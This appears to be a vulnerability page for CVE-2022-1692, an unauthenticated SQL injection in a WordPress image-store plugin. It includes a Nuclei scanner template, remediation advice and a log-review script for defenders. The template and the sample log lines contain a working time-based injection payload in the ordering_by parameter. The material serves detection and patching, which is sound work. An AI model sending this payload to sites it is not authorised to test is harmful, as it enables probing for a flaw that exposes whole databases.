CP Image Store with Slideshow <= 1.0.67 - SQL Injection

CVE-2022-1692
Verified

Description

The CP Image Store with Slideshow WordPress plugin before 1.0.68 does not sanitise and escape the ordering_by query parameter before using it in a SQL statement on pages where the [codepeople-image-store] shortcode is embedded, allowing unauthenticated users to perform an SQL injection attack.

Severity

Critical

CVSS Score

9.8

Exploit Probability

73%

Published Date

February 26, 2026

Template Author

shivam kamboj

CVE-2022-1692.yaml
id: CVE-2022-1692

info:
  name: CP Image Store with Slideshow <= 1.0.67 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The CP Image Store with Slideshow WordPress plugin before 1.0.68 does not sanitise and escape the ordering_by query parameter before using it in a SQL statement in pages where the [codepeople-image-store] is embed, allowing unauthenticated users to perform an SQL injection attack.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or full database compromise.
  remediation: |
    Update to version 1.0.68 or later.
  reference:
    - https://wpscan.com/vulnerability/83bae80c-f583-4d89-8282-e6384bbc7571/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cp-image-store/cp-image-store-with-slideshow-1067-unauthenticated-sql-injection
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1692
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1692
    epss-score: 0.73448
    epss-percentile: 0.98823
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2022,wordpress,wp,wp-plugin,sqli,cp-image-store,unauth

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/?s=codepeople-image-store&post_type=page&feed=rss2"

    matchers:
      - type: word
        words:
          - '<item>'
        internal: true

    extractors:
      - type: regex
        name: path
        regex:
          - '<link>https?://[^/]+(/[a-zA-Z0-9][^<]*)</link>'
        group: 1
        internal: true

  - method: GET
    path:
      - "{{RootURL}}{{path}}?ordering_by=post_title%20DESC%2C(SELECT%209143%20FROM%20(SELECT(SLEEP(8)))cFAm)--%20"

    redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'contains(body, "cpis_image=")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502210087c357a879960b0180907a747f5b42e8ed48c9e994b7820a77ed3facd333227802202f867935a919ed33774b7a3828995408c97ab1f673d6260ab11c8615223370e9:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2022-1692
CWE ID:
cwe-89

References

https://wpscan.com/vulnerability/83bae80c-f583-4d89-8282-e6384bbc7571/
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cp-image-store/cp-image-store-with-slideshow-1067-unauthenticated-sql-injection
https://nvd.nist.gov/vuln/detail/CVE-2022-1692

Remediation Steps

Update to version 1.0.68 or later.
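
For sites that ran 1.0.67 or earlier, web access logs can be reviewed for ordering_by values that are not a plain sort key. The following is an added example, not part of the template or the plugin's code. It assumes combined-format access logs and that a legitimate ordering_by value is a single column name with an optional ASC/DESC; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate value is one identifier plus an optional direction.
SAFE_ORDER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*(\s+(ASC|DESC))?$", re.IGNORECASE)

# Client IP, request target and status from a combined-format log entry.
REQUEST = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def suspicious_ordering_by(log_lines):
    """Return one finding per ordering_by value that is not a plain sort key."""
    findings = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a parseable request line
        query = urlsplit(m["target"]).query
        # parse_qs percent-decodes values and maps '+' to a space.
        values = parse_qs(query, keep_blank_values=True).get("ordering_by", [])
        for value in values:
            if not SAFE_ORDER.match(value.strip()):
                findings.append(
                    {"ip": m["ip"], "status": int(m["status"]), "value": value}
                )
    return findings

# Constructed sample entries (documentation IP ranges, hypothetical /shop/ page).
SAMPLE_LOG = [
    '198.51.100.4 - - [10/May/2022:09:58:11 +0000] '
    '"GET /shop/?ordering_by=post_title+DESC HTTP/1.1" 200 4821 "-" "-"',
    '203.0.113.7 - - [10/May/2022:10:00:00 +0000] '
    '"GET /shop/?ordering_by=post_title%20DESC%2C(SELECT%209143%20FROM%20'
    '(SELECT(SLEEP(8)))cFAm)--%20 HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.9 - - [10/May/2022:10:01:30 +0000] '
    '"GET /shop/?page=2 HTTP/1.1" 200 4700 "-" "-"',
]

if __name__ == "__main__":
    for hit in suspicious_ordering_by(SAMPLE_LOG):
        print(hit["ip"], hit["status"], repr(hit["value"]))
```

Any hit against a site that was running a version before 1.0.68 at the time of the request warrants a review of database activity for that period.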